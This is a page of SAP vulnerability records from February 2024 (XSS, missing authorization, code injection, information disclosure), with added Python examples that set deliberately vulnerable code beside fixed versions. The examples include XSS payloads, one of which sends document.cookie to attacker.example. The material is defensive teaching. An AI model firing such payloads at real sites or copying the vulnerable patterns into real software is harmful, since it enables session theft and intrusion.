datePublished: "2024-02-13T02:29:51.706Z", dateReserved: "2024-01-05T10:21:35.256Z", dateUpdated: "2024-08-01T22:35:34.802Z", 
state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
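CVE-2024-22126 (URL parameters copied into a redirect URL) and CVE-2024-22130 (user input rendered in the print preview) are both output-encoding failures; what differs is the context the input lands in, and each context needs its own encoder. The Python example below is added here and is not SAP's code or anything from notes 3417627 or 3410875; the redirect host allowlist, the preview markup and the sample inputs are constructed for illustration. It shows the raw-concatenation pattern beside a version that entity-encodes for the HTML body, percent-encodes query parameters, and refuses redirect targets whose scheme or host is not allowlisted (which also stops `javascript:` and scheme-relative targets).

```python
import html
from urllib.parse import quote, urlencode, urlsplit

# Hosts this application may redirect to (constructed allowlist for the example).
ALLOWED_REDIRECT_HOSTS = {"portal.example.internal"}


def render_preview_vulnerable(subject: str) -> str:
    """Untrusted input concatenated straight into HTML (the CVE-2024-22130 pattern)."""
    return f"<h1>Print preview: {subject}</h1>"


def render_preview_safe(subject: str) -> str:
    """HTML-entity encode for the HTML body context; quote=True also covers attribute values."""
    return f"<h1>Print preview: {html.escape(subject, quote=True)}</h1>"


def build_redirect_vulnerable(target: str, params: dict) -> str:
    """Parameters dropped raw into the redirect URL (the CVE-2024-22126 pattern)."""
    query = "&".join(f"{k}={v}" for k, v in params.items())
    return f"{target}?{query}"


def redirect_target_allowed(target: str) -> bool:
    """Accept only absolute https URLs to an allowlisted host.

    javascript:, data: and scheme-relative (//evil.example) targets all fail the scheme
    test; an open redirect to an arbitrary external host fails the host test; a
    userinfo trick (https://portal.example.internal@evil.example/) fails because the
    whole netloc is compared, not a prefix of it.
    """
    parts = urlsplit(target)
    return parts.scheme == "https" and parts.netloc in ALLOWED_REDIRECT_HOSTS


def build_redirect_safe(target: str, params: dict) -> str:
    """Validate the target, then percent-encode path and query for the URL context."""
    if not redirect_target_allowed(target):
        raise ValueError(f"redirect target not allowed: {target!r}")
    parts = urlsplit(target)
    # quote() leaves '/' alone in the path; urlencode() percent-encodes every key and
    # value, so '&', '=', '<', '>' and quotes cannot escape their own parameter.
    return f"{parts.scheme}://{parts.netloc}{quote(parts.path)}?{urlencode(params)}"


if __name__ == "__main__":
    payload = '"><script>alert(document.cookie)</script>'
    print(render_preview_vulnerable(payload))
    print(render_preview_safe(payload))
    print(build_redirect_vulnerable("https://portal.example.internal/home", {"msg": payload}))
    print(build_redirect_safe("https://portal.example.internal/home", {"msg": payload}))
```

Encoding alone does not fix the redirect case: a correctly percent-encoded `javascript:alert(1)` is still a `javascript:` URL once the browser follows it, which is why the target is validated against an allowlist before any parameter is appended.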
cve-2024-22131
Vulnerability from cvelistv5
Published
2024-02-13 02:30
Modified
2024-08-01 22:35
Summary
In SAP ABA (Application Basis) - versions 700, 701, 702, 731, 740, 750, 751, 752, 75C, 75I, an attacker authenticated as a user with a remote execution authorization can use a vulnerable interface. This allows the attacker to use the interface to invoke an application function to perform actions which they would not normally be permitted to perform. Depending on the function executed, the attack can read or modify any user/business data and can make the entire system unavailable.
References
Impacted products
Vendor | Product | Version
---|---|---
SAP_SE | SAP ABA (Application Basis) | 700, 701, 702, 731, 740, 750, 751, 752, 75C, 75I
{ containers: { adp: [ { affected: [ { cpes: [ "cpe:2.3:a:sap:sap_aba:*:*:*:*:*:*:*:*", ], defaultStatus: "unknown", product: "sap_aba", vendor: "sap", versions: [ { status: "affected", version: "700", }, { status: "affected", version: "701", }, { status: "affected", version: "702", }, { status: "affected", version: "731", }, { status: "affected", version: "740", }, { status: "affected", version: "750", }, { status: "affected", version: "751", }, { status: "affected", version: "752", }, { status: "affected", version: "75c", }, { status: "affected", version: "75i", }, ], }, ], metrics: [ { other: { content: { id: "CVE-2024-22131", options: [ { Exploitation: "none", }, { Automatable: "no", }, { "Technical Impact": "total", }, ], role: "CISA Coordinator", timestamp: "2024-04-11T04:00:52.278648Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-06-28T16:05:04.503Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, { providerMetadata: { dateUpdated: "2024-08-01T22:35:34.897Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/3420923", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "unaffected", product: "SAP ABA (Application Basis)", vendor: "SAP_SE", versions: [ { status: "affected", version: "700", }, { status: "affected", version: "701", }, { status: "affected", version: "702", }, { status: "affected", version: "731", }, { status: "affected", version: "740", }, { status: "affected", version: "750", }, { status: "affected", version: "751", }, { status: "affected", version: "752", }, { status: "affected", version: "75C", }, { status: "affected", version: "75I", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: 
false, type: "text/html", value: "<p>In SAP ABA (Application Basis) - versions 700, 701, 702, 731, 740, 750, 751, 752, 75C, 75I, an attacker authenticated as a user with a remote execution authorization can use a vulnerable interface. This allows the attacker to use the interface to invoke an application function to perform actions which they would not normally be permitted to perform. Depending on the function executed, the attack can read or modify any user/business data and can make the entire system unavailable.</p>", }, ], value: "In SAP ABA (Application Basis) - versions 700, 701, 702, 731, 740, 750, 751, 752, 75C, 75I, an attacker authenticated as a user with a remote execution authorization can use a vulnerable interface. This allows the attacker to use the interface to invoke an application function to perform actions which they would not normally be permitted to perform. Depending on the function executed, the attack can read or modify any user/business data and can make the entire system unavailable.\n\n", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 9.1, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "HIGH", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-94", description: "CWE-94: Improper Control of Generation of Code ('Code Injection')", lang: "eng", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-02-13T02:30:51.886Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: "sap", }, references: [ { url: "https://me.sap.com/notes/3420923", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], source: { discovery: "UNKNOWN", }, title: "Code Injection vulnerability in 
SAP ABA (Application Basis)", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2024-22131", datePublished: "2024-02-13T02:30:51.886Z", dateReserved: "2024-01-05T10:21:35.256Z", dateUpdated: "2024-08-01T22:35:34.897Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2024-25643
Vulnerability from cvelistv5
Published
2024-02-13 03:37
Modified
2024-08-01 23:44
Summary
The SAP Fiori app (My Overtime Request) - version 605, does not perform the necessary authorization checks for an authenticated user which may result in an escalation of privileges. It is possible to manipulate the URLs of data requests to access information that the user should not have access to. There is no impact on integrity and availability.
References
Impacted products
Vendor | Product | Version
---|---|---
SAP_SE | SAP Fiori app (My Overtime Requests) | 605
{ containers: { adp: [ { metrics: [ { other: { content: { id: "CVE-2024-25643", options: [ { Exploitation: "none", }, { Automatable: "no", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2024-02-14T19:44:56.974359Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-06-04T17:35:09.212Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, { providerMetadata: { dateUpdated: "2024-08-01T23:44:09.819Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/3237638", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "unaffected", product: "SAP Fiori app (My Overtime Requests)", vendor: "SAP_SE", versions: [ { status: "affected", version: "605", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "The SAP Fiori app (My Overtime Request) - version 605, does not perform the necessary authorization checks for an authenticated user which may result in an escalation of privileges. It is possible to manipulate the URLs of data requests to access information that the user should not have access to. There is no impact on integrity and availability.", }, ], value: "The SAP Fiori app (My Overtime Request) - version 605, does not perform the necessary authorization checks for an authenticated user which may result in an escalation of privileges. It is possible to manipulate the URLs of data requests to access information that the user should not have access to. 
There is no impact on integrity and availability.", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 4.3, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-862", description: "CWE-862 Missing Authorization", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-02-13T03:37:14.954Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: "sap", }, references: [ { url: "https://me.sap.com/notes/3237638", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], source: { discovery: "UNKNOWN", }, title: "Missing authorization check in SAP Fiori app (My Overtime Requests)", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2024-25643", datePublished: "2024-02-13T03:37:14.954Z", dateReserved: "2024-02-09T04:10:20.036Z", dateUpdated: "2024-08-01T23:44:09.819Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
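Four of the entries on this page share one root cause: the caller is authenticated, but the code never asks whether this caller may touch this object or call this function. CVE-2024-24741, CVE-2024-24739 and CVE-2024-25643 are missing authorization checks (CWE-862; in the Fiori case the record id in the data request URL is simply changed), and CVE-2024-22131 is an interface that lets a user holding only a generic remote-execution right invoke application functions they are not otherwise entitled to. The Python example below is added here and is not SAP's code or anything from the referenced notes; the users, authorization labels, records and function names are constructed for illustration. It shows the two vulnerable shapes (object lookup without an ownership check; dynamic resolution of any function by name behind one coarse right) next to their corrected forms: a per-object check, and an explicit allowlist of callable functions each tied to its own authorization.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    name: str
    auths: frozenset  # authorization values granted to this user (constructed labels)


# Constructed sample users.
ALICE = User("alice", frozenset({"REMOTE_EXEC", "MATERIAL:READ"}))
HR_AUDITOR = User("hr", frozenset({"OVERTIME:READ_ALL"}))

# Constructed sample data: overtime requests, each owned by one employee.
OVERTIME_REQUESTS = {
    101: {"owner": "alice", "hours": 4},
    102: {"owner": "bob", "hours": 12},
}

# Constructed sample data: material master records.
MATERIALS = {"M-1000": {"description": "Valve", "cost": 42.0}}


def read_material(material_id: str) -> dict:
    return MATERIALS[material_id]


def delete_material(material_id: str) -> bool:
    return MATERIALS.pop(material_id, None) is not None


# Allowlist of functions reachable through the remote interface, each with the
# authorization it requires. A name not listed here cannot be invoked at all.
REMOTE_FUNCTIONS = {
    "READ_MATERIAL": (read_material, "MATERIAL:READ"),
    "DELETE_MATERIAL": (delete_material, "MATERIAL:DELETE"),
}
REMOTE_EXEC = "REMOTE_EXEC"  # the generic "may call remote functions" right


# --- object-level authorization (CWE-862) ---------------------------------------

def get_overtime_request_vulnerable(user: User, request_id: int) -> dict:
    """Authenticated but unauthorized: any user reads any record by changing the id."""
    return OVERTIME_REQUESTS[request_id]


def may_read_request(user: User, request_id: int) -> bool:
    rec = OVERTIME_REQUESTS.get(request_id)
    if rec is None:
        return False
    return rec["owner"] == user.name or "OVERTIME:READ_ALL" in user.auths


def get_overtime_request(user: User, request_id: int) -> dict:
    if not may_read_request(user, request_id):
        # Same response for "not yours" and "does not exist", so ids cannot be enumerated.
        raise PermissionError("not authorized")
    return OVERTIME_REQUESTS[request_id]


# --- function-level authorization on a remote interface ------------------------

def remote_call_vulnerable(user: User, func_name: str, **kwargs):
    """Checks only the coarse remote-execution right, then resolves any name at all."""
    if REMOTE_EXEC not in user.auths:
        raise PermissionError("no remote execution right")
    return globals()[func_name](**kwargs)  # 'delete_material' is reachable this way


def may_call(user: User, func_name: str) -> bool:
    entry = REMOTE_FUNCTIONS.get(func_name)
    return entry is not None and REMOTE_EXEC in user.auths and entry[1] in user.auths


def remote_call(user: User, func_name: str, **kwargs):
    if not may_call(user, func_name):
        raise PermissionError(f"not authorized for {func_name}")
    func, _ = REMOTE_FUNCTIONS[func_name]
    return func(**kwargs)


if __name__ == "__main__":
    print(may_read_request(ALICE, 101), may_read_request(ALICE, 102), may_read_request(HR_AUDITOR, 102))
    print(may_call(ALICE, "READ_MATERIAL"), may_call(ALICE, "DELETE_MATERIAL"), may_call(ALICE, "delete_material"))
```

The check belongs at the point where the object or function is resolved, not at the entry to the application: a user who legitimately reaches the screen still has to be entitled to each record the screen's data requests return.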
cve-2024-24740
Vulnerability from cvelistv5
Published
2024-02-13 02:35
Modified
2024-09-28 22:22
Summary
SAP NetWeaver Application Server (ABAP) - versions KERNEL 7.53, KERNEL 7.54, KERNEL 7.77, KERNEL 7.85, KERNEL 7.89, KERNEL 7.93, KERNEL 7.94, KRNL64UC 7.53, under certain conditions, allows an attacker to access information which could otherwise be restricted with low impact on confidentiality of the application.
References
Impacted products
Vendor | Product | Version
---|---|---
SAP_SE | SAP NetWeaver Application Server ABAP (SAP Kernel) | KERNEL 7.53, KERNEL 7.54, KERNEL 7.77, KERNEL 7.85, KERNEL 7.89, KERNEL 7.93, KERNEL 7.94, KRNL64UC 7.53
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-01T23:28:11.763Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/3360827", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "unaffected", product: "SAP NetWeaver Application Server ABAP (SAP Kernel)", vendor: "SAP_SE", versions: [ { status: "affected", version: "KERNEL 7.53", }, { status: "affected", version: "KERNEL 7.54", }, { status: "affected", version: "KERNEL 7.77", }, { status: "affected", version: "KERNEL 7.85", }, { status: "affected", version: "KERNEL 7.89", }, { status: "affected", version: "KERNEL 7.93", }, { status: "affected", version: "KERNEL 7.94", }, { status: "affected", version: "KRNL64UC 7.53", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "<p>SAP NetWeaver Application Server (ABAP) - versions KERNEL 7.53, KERNEL 7.54, KERNEL 7.77, KERNEL 7.85, KERNEL 7.89, KERNEL 7.93, KERNEL 7.94, KRNL64UC 7.53, under certain conditions, allows an attacker to access information which could otherwise be restricted with low impact on confidentiality of the application.</p>", }, ], value: "SAP NetWeaver Application Server (ABAP) - versions KERNEL 7.53, KERNEL 7.54, KERNEL 7.77, KERNEL 7.85, KERNEL 7.89, KERNEL 7.93, KERNEL 7.94, KRNL64UC 7.53, under certain conditions, allows an attacker to access information which could otherwise be restricted with low impact on confidentiality of the application.", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-732", description: "CWE-732: Incorrect Permission Assignment for Critical Resource", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-09-28T22:22:42.214Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: "sap", }, references: [ { url: "https://me.sap.com/notes/3360827", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], source: { discovery: "UNKNOWN", }, title: "Information Disclosure vulnerability in SAP NetWeaver Application Server ABAP (SAP Kernel)", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2024-24740", datePublished: "2024-02-13T02:35:21.224Z", dateReserved: "2024-01-29T05:13:46.617Z", dateUpdated: "2024-09-28T22:22:42.214Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2024-22129
Vulnerability from cvelistv5
Published: 2024-02-13 03:40
Modified: 2024-08-01 22:35
Summary
SAP Companion - version <3.1.38, has a URL with parameter that could be vulnerable to XSS attack. The attacker could send a malicious link to a user that would possibly allow an attacker to retrieve the sensitive information and cause minor impact on the integrity of the web application.
Impacted products
Vendor | Product | Version
---|---|---
SAP_SE | SAP Companion | <3.1.38
{ containers: { adp: [ { metrics: [ { other: { content: { id: "CVE-2024-22129", options: [ { Exploitation: "none", }, { Automatable: "no", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2024-02-16T15:17:38.457926Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-06-04T17:52:24.034Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, { providerMetadata: { dateUpdated: "2024-08-01T22:35:34.889Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/3404025", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "unaffected", product: "SAP Companion", vendor: "SAP_SE", versions: [ { status: "affected", version: "<3.1.38", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "<p>SAP Companion - version <3.1.38, has a URL with parameter that could be vulnerable to XSS attack. The attacker could send a malicious link to a user that would possibly allow an attacker to retrieve the sensitive information and cause minor impact on the integrity of the web application.</p>", }, ], value: "SAP Companion - version <3.1.38, has a URL with parameter that could be vulnerable to XSS attack. 
The attacker could send a malicious link to a user that would possibly allow an attacker to retrieve the sensitive information and cause minor impact on the integrity of the web application.\n\n", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 5.4, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-79", description: "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", lang: "eng", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-02-13T03:40:54.670Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: "sap", }, references: [ { url: "https://me.sap.com/notes/3404025", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], source: { discovery: "UNKNOWN", }, title: "Cross-Site Scripting (XSS) vulnerability in SAP Companion", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2024-22129", datePublished: "2024-02-13T03:40:54.670Z", dateReserved: "2024-01-05T10:21:35.256Z", dateUpdated: "2024-08-01T22:35:34.889Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2024-24742
Vulnerability from cvelistv5
Published: 2024-02-13 02:42
Modified: 2024-08-01 23:28
Summary
SAP CRM WebClient UI - version S4FND 102, S4FND 103, S4FND 104, S4FND 105, S4FND 106, WEBCUIF 701, WEBCUIF 731, WEBCUIF 746, WEBCUIF 747, WEBCUIF 748, WEBCUIF 800, WEBCUIF 801, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. An attacker with low privileges can cause limited impact to integrity of the application data after successful exploitation. There is no impact on confidentiality and availability.
Impacted products
Vendor | Product | Version
---|---|---
SAP_SE | SAP CRM (WebClient UI) | S4FND 102, S4FND 103, S4FND 104, S4FND 105, S4FND 106, WEBCUIF 701, WEBCUIF 731, WEBCUIF 746, WEBCUIF 747, WEBCUIF 748, WEBCUIF 800, WEBCUIF 801
{ containers: { adp: [ { metrics: [ { other: { content: { id: "CVE-2024-24742", options: [ { Exploitation: "none", }, { Automatable: "no", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2024-03-07T18:45:10.761225Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-06-04T17:43:29.079Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, { providerMetadata: { dateUpdated: "2024-08-01T23:28:12.196Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/3158455", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "unaffected", product: "SAP CRM (WebClient UI)", vendor: "SAP_SE", versions: [ { status: "affected", version: "S4FND 102", }, { status: "affected", version: "S4FND 103", }, { status: "affected", version: "S4FND 104", }, { status: "affected", version: "S4FND 105", }, { status: "affected", version: "S4FND 106", }, { status: "affected", version: "WEBCUIF 701", }, { status: "affected", version: "WEBCUIF 731", }, { status: "affected", version: "WEBCUIF 746", }, { status: "affected", version: "WEBCUIF 747", }, { status: "affected", version: "WEBCUIF 748", }, { status: "affected", version: "WEBCUIF 800", }, { status: "affected", version: "WEBCUIF 801", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "<p>SAP CRM WebClient UI - version S4FND 102, S4FND 103, S4FND 104, S4FND 105, S4FND 106, WEBCUIF 701, WEBCUIF 731, WEBCUIF 746, WEBCUIF 747, WEBCUIF 748, WEBCUIF 800, WEBCUIF 801, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. 
An attacker with low privileges can cause limited impact to integrity of the application data after successful exploitation. There is no impact on confidentiality and availability.</p>", }, ], value: "SAP CRM WebClient UI - version S4FND 102, S4FND 103, S4FND 104, S4FND 105, S4FND 106, WEBCUIF 701, WEBCUIF 731, WEBCUIF 746, WEBCUIF 747, WEBCUIF 748, WEBCUIF 800, WEBCUIF 801, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. An attacker with low privileges can cause limited impact to integrity of the application data after successful exploitation. There is no impact on confidentiality and availability.\n\n", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 4.1, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "LOW", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-79", description: "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", lang: "eng", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-02-13T02:42:56.483Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: "sap", }, references: [ { url: "https://me.sap.com/notes/3158455", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], source: { discovery: "UNKNOWN", }, title: "Cross-Site Scripting (XSS) vulnerability in SAP CRM (WebClient UI)", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2024-24742", datePublished: "2024-02-13T02:42:56.483Z", dateReserved: "2024-01-29T05:13:46.617Z", dateUpdated: 
"2024-08-01T23:28:12.196Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
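The two CWE-79 records above, CVE-2024-22129 (a URL parameter reflected into the page, delivered by a malicious link) and CVE-2024-24742 (user-controlled input not sufficiently encoded during page generation), describe the same defect class from two angles. The following is an added example, not SAP code and not part of the advisory or the CVE records: a minimal server-side renderer in its vulnerable form beside one that encodes for each output context, run against a constructed attacker link. The parameter name `q`, the host names and the page markup are assumptions; neither record names the affected parameter.

```python
# Added example (not SAP code, not from the advisory): the CWE-79 pattern behind
# CVE-2024-22129 and CVE-2024-24742, as a vulnerable page renderer beside one
# that encodes for each output context. Parameter name, hosts and markup are
# assumptions; the advisory does not name the affected parameters.
from html import escape
from urllib.parse import parse_qs, quote, urlsplit


def get_param(url: str, name: str, default: str = "") -> str:
    """Return the first value of query parameter `name` from a full URL."""
    return parse_qs(urlsplit(url).query).get(name, [default])[0]


def render_vulnerable(url: str) -> str:
    """Interpolate the raw parameter into HTML text and into a URL attribute.

    This is the defect class the advisory describes: user-controlled input is
    placed in the page without neutralisation, so a crafted link runs script
    in the victim's browser session.
    """
    q = get_param(url, "q")
    return f'<h1>Results for {q}</h1><a href="/search?q={q}">search again</a>'


def render_hardened(url: str) -> str:
    """Encode per output context: HTML escaping for element text, percent-
    encoding for the query component inside the href attribute."""
    q = get_param(url, "q")
    return (
        f"<h1>Results for {escape(q, quote=True)}</h1>"
        f'<a href="/search?q={quote(q, safe="")}">search again</a>'
    )


def has_injected_markup(html_out: str) -> bool:
    """Crude detector for the payload used below: a live <script> tag or an
    attribute break-out sequence surviving into the rendered HTML."""
    low = html_out.lower()
    return "<script" in low or '"><' in low


# Constructed attacker link (not a real SAP URL): the payload exfiltrates
# the session cookie of whoever clicks it.
PAYLOAD = '"><script>fetch("https://attacker.example/?c="+document.cookie)</script>'
MALICIOUS_URL = "https://companion.example/help?q=" + quote(PAYLOAD, safe="")


def demo() -> dict:
    """Render the same link both ways; report which renderer is exploitable."""
    return {
        "vulnerable": has_injected_markup(render_vulnerable(MALICIOUS_URL)),
        "hardened": has_injected_markup(render_hardened(MALICIOUS_URL)),
    }


if __name__ == "__main__":
    print(render_vulnerable(MALICIOUS_URL))
    print(render_hardened(MALICIOUS_URL))
    print(demo())
```

The point of the two encoders is that the same value needs a different transformation depending on where it lands: `html.escape` is correct for element text and quoted attribute values, but a value placed inside a URL must be percent-encoded as a query component, otherwise a payload such as `javascript:` or an attribute break-out survives the HTML escape. SAP's fix for the products above is the vendor's own; the note numbers in the records (3404025, 3158455) are where the actual corrections are documented.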
cve-2023-49580
Vulnerability from cvelistv5
Published: 2023-12-12 01:09
Modified: 2024-09-28 22:14
Summary
SAP GUI for Windows and SAP GUI for Java - versions SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758, allow an unauthenticated attacker to access information which would otherwise be restricted and confidential. In addition, this vulnerability allows the unauthenticated attacker to create Layout configurations of the ABAP List Viewer and with this causing a mild impact on integrity and availability, e.g. also increasing the response times of the AS ABAP.
Impacted products
Vendor | Product | Version
---|---|---
SAP_SE | SAP GUI for Windows and SAP GUI for Java | SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758
